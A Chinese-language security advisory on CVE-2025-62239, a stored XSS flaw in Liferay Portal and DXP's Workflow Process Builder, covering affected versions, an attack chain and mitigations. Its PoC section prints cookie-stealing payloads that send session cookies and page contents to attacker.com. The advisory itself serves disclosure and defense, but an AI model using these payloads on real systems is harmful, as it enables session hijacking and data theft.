CVE-2025-62239 Liferay Portal工作流构建器XSS漏洞

漏洞信息

漏洞编号

CVE-2025-62239

漏洞类型

跨站脚本攻击（XSS）

CVSS评分

5.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

Liferay Portal 和 Liferay DXP

漏洞概述

CVE-2025-62239是Liferay Portal和Liferay DXP产品工作流流程构建器（Workflow Process Builder）中存在的一个跨站脚本（XSS）漏洞。该漏洞的CVSS 3.1评分为5.4分，属于中危级别。Liferay是一款广泛使用的企业级开源门户平台和数字体验平台（DXP），被大量企业用于构建门户网站、内容管理系统和协作平台。

该漏洞存在于工作流定义（workflow definition）的输入处理逻辑中，远程经过认证的攻击者可以通过在工作流定义中提交精心构造的恶意输入，注入任意Web脚本或HTML代码。由于工作流是Liferay平台的核心功能之一，涉及审批流程、文档流转等关键业务场景，因此该漏洞可能被利用来窃取用户会话、篡改页面内容、进行钓鱼攻击或进一步实施其他恶意行为。

漏洞影响范围广泛，涵盖Liferay Portal 7.4.3.21至7.4.3.111版本，以及Liferay DXP的多个版本线，包括2023.Q4.0至2023.Q4.5、2023.Q3.1至2023.Q3.8以及7.4 update 21至update 92。鉴于Liferay在企业级市场中的广泛应用，该漏洞对受影响组织的信息安全构成潜在威胁，建议相关用户尽快评估影响并采取修复措施。

技术细节

该XSS漏洞的根本原因在于Liferay工作流流程构建器（Workflow Process Builder）在处理用户输入时，未对工作流定义中的特定字段进行充分的输入验证和输出编码。当经过认证的低权限用户创建或编辑工作流定义时，恶意构造的JavaScript代码或HTML标签可以被持久化存储到系统中。

从攻击向量来看，该漏洞的攻击复杂度较低（AC:L），攻击者需要拥有有效的低权限账户（PR:L），并且需要用户交互（UI:R）来触发恶意脚本的执行。漏洞的影响范围为已变更（Scope Changed, S:C），意味着被利用后可能影响到超出该组件的安全范围。

利用方式方面，攻击者首先需要拥有一个有效的Liferay账户（低权限即可），然后在工作流定义编辑界面中，在特定输入字段（如工作流名称、描述、脚本节点或其他可配置字段）中注入恶意JavaScript代码或HTML标签。当其他用户（包括管理员）查看、编辑或与该工作流交互时，恶意脚本将在受害者浏览器上下文中执行，从而实现会话劫持、权限提升或敏感信息窃取等攻击目的。

由于该漏洞属于存储型XSS（Stored XSS），恶意载荷会持久化保存在服务器端，因此影响范围更广，危害更大。

攻击链分析

STEP 1

步骤1：获取账户

攻击者通过注册或钓鱼等方式获取Liferay Portal/DXP的有效低权限用户账户。

STEP 2

步骤2：访问工作流构建器

攻击者登录系统后，导航至工作流流程构建器（Workflow Process Builder）界面。

STEP 3

步骤3：注入恶意载荷

攻击者在创建或编辑工作流定义时，在可输入字段中注入精心构造的恶意JavaScript代码或HTML标签（如<script>标签或事件处理器）。

STEP 4

步骤4：持久化存储

由于缺乏输入验证和输出编码，恶意载荷被持久化保存到服务器端的工作流定义中。

STEP 5

步骤5：触发执行

当其他用户（尤其是管理员）查看、编辑或与受感染的工作流进行交互时，恶意脚本在受害者浏览器上下文中执行。

STEP 6

步骤6：实施进一步攻击

攻击者利用执行的脚本窃取用户会话Cookie、进行权限提升、篡改页面内容或实施其他恶意活动。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CVE-2025-62239 - Liferay Workflow Process Builder Stored XSS PoC -->
<!-- Attacker injects malicious script via workflow definition fields -->

<!-- Step 1: Authenticate to Liferay Portal as a low-privilege user -->
<!-- Step 2: Navigate to Workflow Process Builder -->
<!-- Step 3: Create or edit a workflow definition with malicious payload -->

<!-- Example malicious payload injected into workflow definition name/description/script field: -->
<script>document.location='https://attacker.com/steal?cookie='+document.cookie</script>

<!-- Alternative payload using event handler: -->
<img src=x onerror="fetch('https://attacker.com/exfil',{method:'POST',body:JSON.stringify({cookies:document.cookie,dom:document.body.innerHTML})})">

<!-- Step 4: When another user (e.g., admin) views/interacts with the workflow -->
<!-- The stored XSS payload executes in the victim's browser context -->
<!-- Attacker can steal session cookies, perform actions as the victim, etc. -->

<!-- HTTP Request Example (simplified): -->
<!-- POST /group/control_panel/manage/-/workflow/edit-workflow-definition HTTP/1.1 -->
<!-- Host: target-liferay-instance.com -->
<!-- Content-Type: application/x-www-form-urlencoded -->
<!-- Cookie: JSESSIONID=attacker_session -->
<!-- -->
<!-- _workflow_definition_name=<script>alert(document.cookie)</script>&... -->

影响范围

Liferay Portal 7.4.3.21 ~ 7.4.3.111

Liferay DXP 2023.Q4.0 ~ 2023.Q4.5

Liferay DXP 2023.Q3.1 ~ 2023.Q3.8

Liferay DXP 7.4 update 21 ~ update 92

防御指南

临时缓解措施

在无法立即升级的情况下，建议采取以下临时缓解措施：1）限制工作流流程构建器的访问权限，仅允许可信管理员操作；2）部署Web应用防火墙（WAF）规则，检测和拦截工作流定义中的恶意脚本注入；3）实施内容安全策略（CSP），限制页面可执行的脚本来源；4）加强用户输入审查，对工作流定义内容进行人工审核；5）监控异常的工作流创建和修改活动，及时发现可疑行为。